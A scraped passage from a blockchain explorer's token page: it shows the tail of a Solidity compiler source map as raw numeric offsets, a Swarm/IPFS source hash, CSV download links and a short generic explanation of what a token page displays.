;12340:77;12337:1;12330:88;12437:4;12434:1;12427:15;12461:4;12458:1;12451:15;12478:320;12522:6;12559:1;12553:4;12549:12;12539:22;;12606:1;12600:4;12596:12;12627:18;12617:81;;12683:4;12675:6;12671:17;12661:27;;12617:81;12745:2;12737:6;12734:14;12714:18;12711:38;12708:84;;12764:18;;:::i;:::-;12708:84;12529:269;12478:320;;;:::o;12804:332::-;12925:4;12963:2;12952:9;12948:18;12940:26;;12976:71;13044:1;13033:9;13029:17;13020:6;12976:71;:::i;:::-;13057:72;13125:2;13114:9;13110:18;13101:6;13057:72;:::i;:::-;12804:332;;;;;:::o;13142:137::-;13196:5;13227:6;13221:13;13212:22;;13243:30;13267:5;13243:30;:::i;:::-;13142:137;;;;:::o;13285:345::-;13352:6;13401:2;13389:9;13380:7;13376:23;13372:32;13369:119;;;13407:79;;:::i;:::-;13369:119;13527:1;13552:61;13605:7;13596:6;13585:9;13581:22;13552:61;:::i;:::-;13542:71;;13498:125;13285:345;;;;:::o;13636:180::-;13684:77;13681:1;13674:88;13781:4;13778:1;13771:15;13805:4;13802:1;13795:15;13822:410;13862:7;13885:20;13903:1;13885:20;:::i;:::-;13880:25;;13919:20;13937:1;13919:20;:::i;:::-;13914:25;;13974:1;13971;13967:9;13996:30;14014:11;13996:30;:::i;:::-;13985:41;;14175:1;14166:7;14162:15;14159:1;14156:22;14136:1;14129:9;14109:83;14086:139;;14205:18;;:::i;:::-;14086:139;13870:362;13822:410;;;;:::o;14238:180::-;14286:77;14283:1;14276:88;14383:4;14380:1;14373:15;14407:4;14404:1;14397:15;14424:185;14464:1;14481:20;14499:1;14481:20;:::i;:::-;14476:25;;14515:20;14533:1;14515:20;:::i;:::-;14510:25;;14554:1;14544:35;;14559:18;;:::i;:::-;14544:35;14601:1;14598;14594:9;14589:14;;14424:185;;;;:::o;14615:191::-;14655:3;14674:20;14692:1;14674:20;:::i;:::-;14669:25;;14708:20;14726:1;14708:20;:::i;:::-;14703:25;;14751:1;14748;14744:9;14737:16;;14772:3;14769:1;14766:10;14763:36;;;14779:18;;:::i;:::-;14763:36;14615:191;;;;:::o;14812:148::-;14914:11;14951:3;14936:18;;14812:148;;;;:::o;14966:303::-;15106:34;15102:1;15094:6;15090:14;15083:58;15179:34;15174:2;15166:6;15162:15;15155:59;15252:5;15247:2;15239:6;15235:15;15228:30;14966:303;:::o;15279:418::-;15439:3;15464:85;15546:2;15541:3;15464:85;:::i;:::-;15457:92;;15562:93;15651:3;15562:93;:::i;:::-;15684:2;15679:3;15675:12;15668:19;;15279:418;;;:::o;15707:410::-;15813:3;15845:39;15878:5;15845:39;:::i;:::-;15904:89;15986:6;15981:3;15904:89;:::i;:::-;15897:96;;16006:65;16064:6;16059:3;16052:4;16045:5;16041:16;16006:65;:::i;:::-;16100:6;16095:3;16091:16;16084:23;;15817:300;15707:410;;;;:::o;16127:163::-;16271:7;16267:1;16259:6;16255:14;16248:31;16127:163;:::o;16300:416::-;16460:3;16485:84;16567:1;16562:3;16485:84;:::i;:::-;16478:91;;16582:93;16671:3;16582:93;:::i;:::-;16704:1;16699:3;16695:11;16688:18;;16300:416;;;:::o;16726:827::-;17060:3;17086:148;17230:3;17086:148;:::i;:::-;17079:155;;17255:95;17346:3;17337:6;17255:95;:::i;:::-;17248:102;;17371:148;17515:3;17371:148;:::i;:::-;17364:155;;17540:3;17533:10;;16726:827;;;;:::o;17563:214::-;17603:4;17627:20;17645:1;17627:20;:::i;:::-;17622:25;;17665:20;17683:1;17665:20;:::i;:::-;17660:25;;17713:1;17710;17706:9;17698:17;;17741:1;17735:4;17732:11;17729:37;;;17746:18;;:::i;:::-;17729:37;17563:214;;;;:::o;17787:106::-;17838:6;17876:5;17870:12;17860:22;;17787:106;;;:::o;17903:180::-;17986:11;18024:6;18019:3;18012:19;18068:4;18063:3;18059:14;18044:29;;17903:180;;;;:::o;18093:393::-;18179:3;18211:38;18243:5;18211:38;:::i;:::-;18269:70;18332:6;18327:3;18269:70;:::i;:::-;18262:77;;18352:65;18410:6;18405:3;18398:4;18391:5;18387:16;18352:65;:::i;:::-;18446:29;18468:6;18446:29;:::i;:::-;18441:3;18437:39;18430:46;;18183:303;18093:393;;;;:::o;18496:668::-;18691:4;18733:3;18722:9;18718:19;18710:27;;18751:71;18819:1;18808:9;18804:17;18795:6;18751:71;:::i;:::-;18836:72;18904:2;18893:9;18889:18;18880:6;18836:72;:::i;:::-;18922;18990:2;18979:9;18975:18;18966:6;18922:72;:::i;:::-;19045:9;19039:4;19035:20;19030:2;19019:9;19015:18;19008:48;19077:76;19148:4;19139:6;19077:76;:::i;:::-;19069:84;;18496:668;;;;;;;:::o;19174:153::-;19230:5;19265:6;19259:13;19250:22;;19285:32;19311:5;19285:32;:::i;:::-;19174:153;;;;:::o;19337:373::-;19406:6;19459:2;19447:9;19438:7;19434:23;19430:32;19427:119;;;19465:79;;:::i;:::-;19427:119;19593:1;19622:63;19677:7;19668:6;19657:9;19653:22;19622:63;:::i;:::-;19612:73;;19560:139;19337:373;;;;:::o

Swarm Source

ipfs://cd7d73abea0df01ed6bf71b3a9ed9314e3a82e98de57633942ed5f2e0189c175
Loading...
Loading
Loading...
Loading
[ Download: CSV Export  ]
[ Download: CSV Export  ]

A token is a representation of an on-chain or off-chain asset. The token page shows information such as price, total supply, holders, transfers and social links. Learn more about this page in our Knowledge Base.